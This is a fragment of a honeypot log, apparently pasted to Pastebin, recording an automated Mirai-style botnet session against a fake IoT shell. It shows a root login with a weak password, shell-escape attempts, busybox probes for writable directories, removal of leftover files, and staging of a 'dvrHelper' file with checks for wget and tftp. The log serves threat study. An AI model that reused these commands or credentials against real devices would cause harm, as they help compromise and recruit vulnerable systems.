  665.                 "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
  666.                 "timestamp": "2019-08-06T17:34:26.038Z"
  667.             },
  668.             {
  669.                 "eventid": "command.input",
  670.                 "input": "/bin/busybox ECCHI",
  671.                 "timestamp": "2019-08-06T17:34:25.801Z"
  672.             },
  673.             {
  674.                 "eventid": "command.input",
  675.                 "input": "/bin/busybox cat /bin/echo",
  676.                 "timestamp": "2019-08-06T17:34:25.559Z"
  677.             },
  678.             {
  679.                 "eventid": "command.input",
  680.                 "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  681.                 "timestamp": "2019-08-06T17:34:25.124Z"
  682.             },
  683.             {
  684.                 "eventid": "command.input",
  685.                 "input": "cd /",
  686.                 "timestamp": "2019-08-06T17:34:25.122Z"
  687.             },
  688.             {
  689.                 "eventid": "command.input",
  690.                 "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
  691.                 "timestamp": "2019-08-06T17:34:25.119Z"
  692.             },
  693.             {
  694.                 "eventid": "command.input",
  695.                 "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
  696.                 "timestamp": "2019-08-06T17:34:25.116Z"
  697.             },
  698.             {
  699.                 "eventid": "command.input",
  700.                 "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
  701.                 "timestamp": "2019-08-06T17:34:25.113Z"
  702.             },
  703.             {
  704.                 "eventid": "command.input",
  705.                 "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
  706.                 "timestamp": "2019-08-06T17:34:25.111Z"
  707.             },
  708.             {
  709.                 "eventid": "command.input",
  710.                 "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
  711.                 "timestamp": "2019-08-06T17:34:25.107Z"
  712.             },
  713.             {
  714.                 "eventid": "command.input",
  715.                 "input": "rm /.t; rm /.sh; rm /.human",
  716.                 "timestamp": "2019-08-06T17:34:25.104Z"
  717.             },
  718.             {
  719.                 "eventid": "command.input",
  720.                 "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
  721.                 "timestamp": "2019-08-06T17:34:25.099Z"
  722.             },
  723.             {
  724.                 "eventid": "command.input",
  725.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
  726.                 "timestamp": "2019-08-06T17:34:23.668Z"
  727.             },
  728.             {
  729.                 "eventid": "command.input",
  730.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
  731.                 "timestamp": "2019-08-06T17:34:23.662Z"
  732.             },
  733.             {
  734.                 "eventid": "command.input",
  735.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
  736.                 "timestamp": "2019-08-06T17:34:23.655Z"
  737.             },
  738.             {
  739.                 "eventid": "command.input",
  740.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
  741.                 "timestamp": "2019-08-06T17:34:23.647Z"
  742.             },
  743.             {
  744.                 "eventid": "command.input",
  745.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
  746.                 "timestamp": "2019-08-06T17:34:22.913Z"
  747.             },
  748.             {
  749.                 "eventid": "command.input",
  750.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
  751.                 "timestamp": "2019-08-06T17:34:22.9Z"
  752.             },
  753.             {
  754.                 "eventid": "command.input",
  755.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
  756.                 "timestamp": "2019-08-06T17:34:22.894Z"
  757.             },
  758.             {
  759.                 "eventid": "command.input",
  760.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
  761.                 "timestamp": "2019-08-06T17:34:22.888Z"
  762.             },
  763.             {
  764.                 "eventid": "command.input",
  765.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
  766.                 "timestamp": "2019-08-06T17:34:22.882Z"
  767.             },
  768.             {
  769.                 "eventid": "command.input",
  770.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
  771.                 "timestamp": "2019-08-06T17:34:22.877Z"
  772.             },
  773.             {
  774.                 "eventid": "command.input",
  775.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
  776.                 "timestamp": "2019-08-06T17:34:22.865Z"
  777.             },
  778.             {
  779.                 "eventid": "command.input",
  780.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
  781.                 "timestamp": "2019-08-06T17:34:22.859Z"
  782.             },
  783.             {
  784.                 "eventid": "command.input",
  785.                 "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
  786.                 "timestamp": "2019-08-06T17:34:22.617Z"
  787.             },
  788.             {
  789.                 "eventid": "command.input",
  790.                 "input": "/bin/busybox ps; /bin/busybox ECCHI",
  791.                 "timestamp": "2019-08-06T17:34:22.375Z"
  792.             },
  793.             {
  794.                 "eventid": "command.input",
  795.                 "input": "bash",
  796.                 "timestamp": "2019-08-06T17:34:21.3Z"
  797.             },
  798.             {
  799.                 "eventid": "command.input",
  800.                 "input": "terminal",
  801.                 "timestamp": "2019-08-06T17:34:21.298Z"
  802.             },
  803.             {
  804.                 "eventid": "command.input",
  805.                 "input": "linuxshell",
  806.                 "timestamp": "2019-08-06T17:34:21.296Z"
  807.             },
  808.             {
  809.                 "eventid": "command.input",
  810.                 "input": "sh",
  811.                 "timestamp": "2019-08-06T17:34:21.295Z"
  812.             },
  813.             {
  814.                 "eventid": "command.input",
  815.                 "input": "shell",
  816.                 "timestamp": "2019-08-06T17:34:21.292Z"
  817.             },
  818.             {
  819.                 "eventid": "command.input",
  820.                 "input": "enable",
  821.                 "timestamp": "2019-08-06T17:34:21.043Z"
  822.             },
  823.             {
  824.                 "eventid": "login.success",
  825.                 "geoip": {
  826.                     "city_name": "",
  827.                     "country_name": "Netherlands"
  828.                 },
  829.                 "password": "linuxshell",
  830.                 "timestamp": "2019-08-06T17:34:20.385Z",
  831.                 "username": "root"
  832.             }
  833.         ]
  834.     }
  835. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top